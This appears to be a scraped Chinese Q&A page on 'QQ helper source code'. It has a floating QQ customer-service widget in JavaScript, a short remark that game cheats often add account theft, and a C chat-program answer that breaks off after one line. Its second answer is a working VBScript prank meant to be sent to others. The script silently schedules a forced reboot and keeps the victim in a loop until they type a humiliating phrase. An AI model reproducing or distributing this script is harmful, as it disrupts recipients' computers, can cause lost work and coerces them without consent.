qq輔助源碼
⑴ 浮動QQ客服源代碼
很簡單的用DIV+javascript很快就實現了。
<script>
var online= new Array();
</script>
<script src="http://webpresence.qq.com/getonline?Type=1&274781833:"></script>
<script language=javascript>var specialcode="<DIV id=searchspe style='Z-INDEX: 100; right: 3px; POSITION: absolute; TOP: 320px; width:130px'><table width='130' border='0' align='center' cellpadding='0' cellspacing='0' bgcolor='#FFFFFF' style='border:solid 1px #1249A3;'><tr><td height='24' align='center' style='font-size:12px;background-color:#1249A3; color:#FFFFFF'>在線服務</td></tr><tr><td bgcolor='#dddddd' height='2'></td></tr><tr><td height='24'><table width='98%' border='0' align='center' cellpadding='0' cellspacing='0'><tr><td height='30' align='center' bordercolor='0' style='font-size:12px'>";
if (online[0]==0)
specialcode=specialcode+"<a href='tencent://message/?uin=274781833&Site=請留言&Menu=yes'><img src='images/offline.jpg' width='73' height='22' border='0'></a> 請留言";
else
specialcode=specialcode+"<a href='tencent://message/?uin=274781833&Site=在線即時交談&Menu=yes'><img src='images/online.gif' width='73' height='22' border='0'></a> 在線交談";
specialcode=specialcode+"</td></tr></table></td></tr></table></DIV>";document.write(specialcode);lastScrollY=0;function heartBeat0(){diffY=document.body.scrollTop;percent=.1*(diffY-lastScrollY);if(percent>0)percent=Math.ceil(percent);else percent=Math.floor(percent);document.all.searchspe.style.pixelTop+=percent;lastScrollY=lastScrollY+percent;}window.setInterval("heartBeat0()",1);</script>
⑵ 求個QQ整人軟體的源代碼
新建一個文本文檔輸入以下內容
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""說我是豬,不說就一分鍾關你機,不信,試試···"" ",0 ,true
dim a
do while(a <> "我是豬")
a = inputbox ("說我是豬,就不關機,快撒,說 ""我是豬"" ","說不說","不說",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早說就行了嘛"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真過癮"
最後保存為.vbe格式
發給別人試試吧 自己就不要試了吧
⑶ 跪求QQ飛車輔助源碼,好多輔助都是改的界面,其實是1個G,是哪個G啊求那個G的源碼!20分
G都是這樣的,換湯不換葯!換葯也只是加味盜號用的而已!
⑷ 如何用c語言編寫QQ聊天程序(源代碼)
1、首先,我們編寫C語言的頭文件#include <stdio.h>。